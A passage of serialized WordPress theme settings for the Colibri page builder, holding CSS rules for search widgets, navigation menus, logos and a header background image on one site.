0px;\n border-left-color: rgb(222, 222, 222);\n border-left-style: none;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n}\n#colibri .style-168 .widget.widget_search h1,#colibri .style-168 .widget.widget_search h2,#colibri .style-168 .widget.widget_search h3,#colibri .style-168 .widget.widget_search h4,#colibri .style-168 .widget.widget_search h5,#colibri .style-168 .widget.widget_search h6 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n font-size: 16px;\n color: #17252a;\n}\n#colibri .style-168 .widget.widget_search {\n background-color: unset;\n background-image: none;\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 1px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 1px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 0px;\n padding-right: 0px;\n padding-bottom: 0px;\n padding-left: 0px;\n margin-bottom: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:170;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:171;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:172;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:173;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:174;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:175;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:176;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:177;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-177 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:178;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:179;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:180;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:181;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:182;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:183;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-183 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:184;a:3:{s:7:\"desktop\";s:2355:\"#colibri .style-184 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-184 .widget input:not([type=\"submit\"]) {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n color: rgb(37, 41, 42);\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-184 .widget ul li a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-184 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget ul li,#colibri .style-184 .widget ol li,#colibri .style-184 .widget .textwidget p,#colibri .style-184 .widget .calendar_wrap td ,#colibri .style-184 .widget .calendar_wrap th ,#colibri .style-184 .widget .calendar_wrap caption {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(37, 41, 42);\n padding-top: 4px;\n padding-bottom: 4px;\n}\n#colibri .style-184 .widget ul,#colibri .style-184 .widget ol {\n list-style-type: none;\n}\n#colibri .style-184 .widget h1,#colibri .style-184 .widget h2,#colibri .style-184 .widget h3,#colibri .style-184 .widget h4,#colibri .style-184 .widget h5,#colibri .style-184 .widget h6 {\n font-family: Open Sans;\n font-weight: 600;\n font-size: 16px;\n line-height: 1.6;\n color: #17252a;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 10px;\n}\n#colibri .style-184 .widget {\n text-align: left;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-184 .widget {\n text-align: center;\n}\n\";}i:185;a:3:{s:7:\"desktop\";s:3575:\"#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n display: inline-block;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"] {\n display: none;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"],#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n background-color: rgb(249, 250, 251);\n background-image: none;\n font-size: 16px;\n line-height: 1;\n color: #17252a;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n width: auto;\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n transition-duration: 0.5s;\n display: inline-block;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n color: rgb(37, 41, 42);\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"]) {\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n font-size: 16px;\n color: rgb(37, 41, 42);\n background-color: rgb(249, 250, 251);\n background-image: none;\n border-top-width: 0px;\n border-top-color: rgb(222, 222, 222);\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-color: rgb(222, 222, 222);\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: rgb(222, 222, 222);\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 0px;\n border-left-width: 0px;\n border-left-color: rgb(222, 222, 222);\n border-left-style: none;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n}\n#colibri .style-184 .widget.widget_search h1,#colibri .style-184 .widget.widget_search h2,#colibri .style-184 .widget.widget_search h3,#colibri .style-184 .widget.widget_search h4,#colibri .style-184 .widget.widget_search h5,#colibri .style-184 .widget.widget_search h6 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n font-size: 16px;\n color: #17252a;\n}\n#colibri .style-184 .widget.widget_search {\n background-color: unset;\n background-image: none;\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 1px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 1px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 0px;\n padding-right: 0px;\n padding-bottom: 0px;\n padding-left: 0px;\n margin-bottom: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:186;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:187;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:188;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:189;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:190;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:191;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:192;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:193;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:194;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:195;a:3:{s:7:\"desktop\";s:385:\"#colibri .style-195 {\n animation-duration: 0.5s;\n padding-top: 20px;\n padding-bottom: 20px;\n background-color: #ffffff;\n background-image: none;\n}\n#colibri .h-navigation_sticky .style-195,#colibri .h-navigation_sticky.style-195 {\n background-color: #ffffff;\n background-image: none;\n padding-top: 10px;\n padding-bottom: 10px;\n box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:195:\"#colibri .style-195 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-195,#colibri .h-navigation_sticky.style-195 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";}i:196;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:197;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-197 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:198;a:3:{s:7:\"desktop\";s:505:\"#colibri .style-198-image {\n max-height: 70px;\n}\n#colibri .style-198 a,#colibri .style-198 .logo-text {\n color: #ffffff;\n text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-198-image,#colibri .h-navigation_sticky.style-198-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-198 a,#colibri .h-navigation_sticky .style-198 .logo-text,#colibri .h-navigation_sticky.style-198 a,#colibri .h-navigation_sticky.style-198 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:199;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-199 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:200;a:3:{s:7:\"desktop\";s:40:\"#colibri .style-200 {\n height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:201;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-201 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:202;a:3:{s:7:\"desktop\";s:8600:\"#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n height: 0px;\n width: 100% ;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li > ul {\n margin-top: 0px;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-202 \n ul.colibri-menu.solid-active-item > li::before {\n background-color: white;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0%;\n border-top-right-radius: 0%;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0%;\n border-bottom-right-radius: 0%;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-202 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: #03a9f4;\n background-image: none;\n height: 3px;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: rgb(255, 255, 255);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul li {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: rgb(255, 255, 255);\n background-image: none;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: #03a9f4;\n background-image: none;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu li > ul {\n background-color: #ffffff;\n background-image: none;\n margin-right: 5px;\n margin-left: 5px;\n box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: rgb(2, 110, 159);\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: #03a9f4;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu {\n justify-content: flex-end;\n}\n#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-202 \n ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-202 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: #03a9f4;\n background-image: none;\n}\n#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-202 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:102:\"#colibri .style-202 > div > .colibri-menu-container > ul.colibri-menu {\n justify-content: center;\n}\n\";}i:203;a:3:{s:7:\"desktop\";s:931:\"#colibri .style-203-offscreen {\n background-color: #222B34;\n background-image: none;\n width: 300px !important;\n}\n#colibri .style-203-offscreenOverlay {\n background-color: rgba(0,0,0,0.5);\n background-image: none;\n}\n#colibri .style-203 .h-hamburger-icon {\n background-color: rgba(0, 0, 0, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: solid;\n border-top-left-radius: 100%;\n border-top-right-radius: 100%;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: solid;\n border-bottom-left-radius: 100%;\n border-bottom-right-radius: 100%;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: solid;\n fill: white;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n width: 24px;\n height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:204;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:205;a:3:{s:7:\"desktop\";s:3947:\"#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-205 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:206;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:207;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-207 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:208;a:3:{s:7:\"desktop\";s:505:\"#colibri .style-208-image {\n max-height: 70px;\n}\n#colibri .style-208 a,#colibri .style-208 .logo-text {\n color: #ffffff;\n text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-208-image,#colibri .h-navigation_sticky.style-208-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-208 a,#colibri .h-navigation_sticky .style-208 .logo-text,#colibri .h-navigation_sticky.style-208 a,#colibri .h-navigation_sticky.style-208 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:209;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:210;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-210 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:211;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-211 ul {\n list-style-type: disc;\n}\n#colibri .style-211 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:212;a:3:{s:7:\"desktop\";s:689:\"#colibri .style-212 {\n min-height: 100vh;\n color: #f6f8fa;\n background-position: 48.828125% 48.69319869319869%;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-header-scaled-1.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n padding-top: 150px;\n padding-bottom: 150px;\n}\n#colibri .style-212 h1 {\n color: #f6f8fa;\n}\n#colibri .style-212 h2 {\n color: #f6f8fa;\n}\n#colibri .style-212 h3 {\n color: #f6f8fa;\n}\n#colibri .style-212 h4 {\n color: #f6f8fa;\n}\n#colibri .style-212 h5 {\n color: #f6f8fa;\n}\n#colibri .style-212 h6 {\n color: #f6f8fa;\n}\n#colibri .style-212 p {\n color: #f6f8fa;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:130:\"#colibri .style-212 {\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-298.png\");\n}\n\";}i:213;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:214;a:3:{s:7:\"desktop\";s:435:\"#colibri .style-214 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 0px;\n border-top-style: solid;\n border-top-left-radius: 9px;\n border-top-right-radius: 9px;\n border-right-width: 0px;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-style: solid;\n border-bottom-left-radius: 9px;\n border-bottom-right-radius: 9px;\n border-left-width: 0px;\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:215;a:3:{s:7:\"desktop\";s:356:\"#colibri .style-215 p,#colibri .style-215 h1,#colibri .style-215 h2,#colibri .style-215 h3,#colibri .style-215 h4,#colibri .style-215 h5,#colibri .style-215 h6 {\n font-weight: 600;\n color: #202a54;\n}\n#colibri .style-215 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:216;a:3:{s:7:\"desktop\";s:193:\"#colibri .style-216 {\n color: #202a54;\n}\n#colibri .style-216 p {\n color: #202a54;\n}\n#colibri .style-216 ol 